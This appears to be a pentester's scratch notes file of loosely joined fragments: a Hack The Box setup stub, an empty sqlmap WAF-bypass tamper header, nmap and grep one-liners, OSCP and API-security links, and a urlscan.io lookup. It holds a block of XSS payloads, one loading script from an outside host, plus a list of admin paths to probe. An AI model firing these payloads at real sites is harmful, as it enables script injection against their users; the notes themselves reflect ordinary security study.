#!/bin/bash
HTB_DATA_DIR=~/Documents/HTB/
if [[ $1 ]]; then
    a=1
else
    echo "Usage: $0 <Box name>"
    exit 1
fi

#!/usr/bin/env python
"""
sqlmap tamper script for bypassing WAF
g4mm4 is my hero
"""
import re
import random
from lib.core.data import kb
from lib.core.enums import PRIORITY

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

# Pull Resolved Hosts From .gnmap Files
grep "Host: " *.gnmap|sed 's/\t/ /g'|tr -s '[:space:]'|cut -d" " -f3|awk '!/\(\)/'|sort -u|sed 's/(//g;s/)//g'
# Pull Alive Host IPs Based on Open Port From .gnmap Files
grep "Host:.*Ports:.*/open/" *.gnmap|cut -d" " -f2
# Pull Alive Host IPs Based on Status From .gnmap Files (Varying Results Based On Scan Flags [i.e.: -Pn])
grep "Host:.*Status: Up" *.gnmap|cut -d" " -f2
# Common Discovery Scan String (Known RTT)

bash, pentesting one-liners and stuff
Basics
grep case insensitive
grep -i "<this>" <file>
grep recursively
grep -ir "<this>" <directory>
grep with word match only (string starting/ending with non-word constituent character)
grep -wi "<this>" <file>
remove/delete filename from grep output
grep -hi "<this>" <file>

/admin/admin.js
/admin/appinfo.jsp
/admin/cache_stats.jsp
/admin/catalogcache.jsp
/admin/ccms/customizing.jsp
/admin/ccms/result.jsp
/admin/ccms/sendFailure.jsp
/ecall/jsp/customer/login/login.jsp
/ecall/jsp/customer/upload/upload.jsp
/user/admin/index.jsp

#notes
https://www.cnblogs.com/keepmoving1113/tag/OSCP/
https://hausec.com/pentesting-cheatsheet/
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
https://noobsec.net/oscp-cheatsheet/
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html
https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/
https://github.com/OlivierLaflamme/Cheatsheet-God
https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html

https://github.com/HolyBugx/HolyTips
https://www.apiopscycles.com/api-audit-checklist
https://github.com/inonshk/31-days-of-API-Security-Tips
https://github.com/shieldfy/API-Security-Checklist
https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html
https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf
https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html
https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html
https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html

#!/bin/bash
# List unique URLs that urlscan.io has recorded for the domain given as $1
curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F "$1" | sort -u